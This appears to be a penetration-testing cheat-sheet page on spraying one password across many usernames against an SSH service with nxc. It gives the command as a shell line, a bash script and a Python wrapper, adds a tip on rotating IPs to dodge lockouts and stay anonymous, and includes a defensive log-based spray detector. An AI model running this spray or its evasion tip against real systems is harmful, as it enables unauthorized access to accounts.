Spray Password Against Usernames
Conduct a password spray attack across multiple usernames on an SSH service.
    nxc ssh <192.168.178.2> -u <path/to/usernames.txt> -p <password>

    #!/bin/bash
    # Spray Password Against Usernames
    # Replace the placeholder values below before running
    nxc ssh "192.168.178.2" -u "path/to/usernames.txt" -p "password"

    import subprocess

    # Spray Password Against Usernames
    # Make sure to replace <placeholders> with actual values
    def run_command():
        # Arguments are passed as a list, so no shell parsing is involved
        cmd = [
            "nxc",
            "ssh",
            "<192.168.178.2>",
            "-u",
            "<path/to/usernames.txt>",
            "-p",
            "<password>"
        ]
        try:
            print(f"Executing: {' '.join(cmd)}")
            subprocess.run(cmd, check=True)
        except subprocess.CalledProcessError as e:
            # nxc exited with a non-zero status
            print(f"Error: {e}")
        except FileNotFoundError:
            print("Error: nxc not found. Please install it first.")

    if __name__ == "__main__":
        run_command()

When To Use
During an assessment of SSH service security and strength against brute-force exploits.
Pro Tip
Implement IP rotation during attacks to minimize lockout conditions and increase anonymity.
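Seen from the defending side, a spray like this shows up in sshd logs as many distinct usernames failing in a short window, and when source addresses are rotated only the count across all sources still reveals it. The following is an added example, not part of the original page; the log lines are constructed, and the function names, window and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log lines (OpenSSH "Failed password" format), not real data.
SINGLE_SOURCE = """\
Mar 10 09:00:01 host sshd[101]: Failed password for invalid user admin from 203.0.113.5 port 40001 ssh2
Mar 10 09:00:03 host sshd[102]: Failed password for alice from 203.0.113.5 port 40002 ssh2
Mar 10 09:00:05 host sshd[103]: Failed password for invalid user guest from 203.0.113.5 port 40003 ssh2
Mar 10 09:00:07 host sshd[104]: Failed password for bob from 203.0.113.5 port 40004 ssh2
Mar 10 09:10:00 host sshd[105]: Failed password for carol from 198.51.100.7 port 50001 ssh2
Mar 10 09:10:20 host sshd[106]: Failed password for carol from 198.51.100.7 port 50002 ssh2
"""
# Constructed: same usernames, each attempt from a different (rotated) address.
ROTATED = "".join(
    f"Mar 10 09:00:0{i} host sshd[20{i}]: Failed password for {u} from 192.0.2.{i} port 4100{i} ssh2\n"
    for i, u in enumerate(["admin", "alice", "guest", "bob"], 1))

FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")

def parse_failures(log_text, year=2024):
    """Return sorted (timestamp, source_ip, username) tuples for failed logins."""
    events = []
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:  # syslog lines carry no year, so one is assumed
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"]))
    return sorted(events)

def max_distinct_users(evts, window):
    """Largest number of distinct usernames failing inside any one window."""
    return max((len({u for t, u in evts[i:] if t - evts[i][0] <= window})
                for i in range(len(evts))), default=0)

def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """Return (sources over threshold, True if threshold is met across all sources)."""
    by_ip = defaultdict(list)
    for ts, ip, user in events:
        by_ip[ip].append((ts, user))
    sources = {ip for ip, ev in by_ip.items()
               if max_distinct_users(ev, window) >= min_users}
    everyone = [(ts, user) for ts, _, user in events]
    return sources, max_distinct_users(everyone, window) >= min_users

if __name__ == "__main__":
    for name, log in (("single source", SINGLE_SOURCE), ("rotated", ROTATED)):
        print(name, detect_spray(parse_failures(log)))
```

The repeated failures for one account (carol) do not trip the per-source check, while the rotated sample is flagged only by the cross-source count.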
Anatomy of Output
Understanding the result
Attempting login for user 'admin'...
Login Attempt Notice: The username is being validated against the SSH service.
Password granted for 'alice'.
Success Confirmation: Indicates successful login with the guessed password.
Access denied for user 'guest'.
Failure Notice: Informs of failed authentication for the given username.
Troubleshooting
Common pitfalls
Permission denied, please try again.
Solution: Verify the correctness of the username and password combinations.
Connection refused: SSH server not active.
Solution: Check that the SSH service is running on the target machine.
Connection timed out.
Solution: Ensure the server’s IP is reachable and responsive.
Command Breakdown
What each part is doing
- nxc - Base Command: The executable that performs this operation; here it runs Nxc.
- <192.168.178.2> - Target: The address of the target host (192.168.178.2 in this example).
- -u - Username option (-u | --username): Tool-specific option that supplies the user value to this command.
- <path/to/usernames.txt> - Path to usernames.txt: The user value supplied to this command, given as the path to the usernames file.
- -p - Password option (-p | --password): Tool-specific option that supplies the password value to this command.
- <password> - Password: The value supplied for password.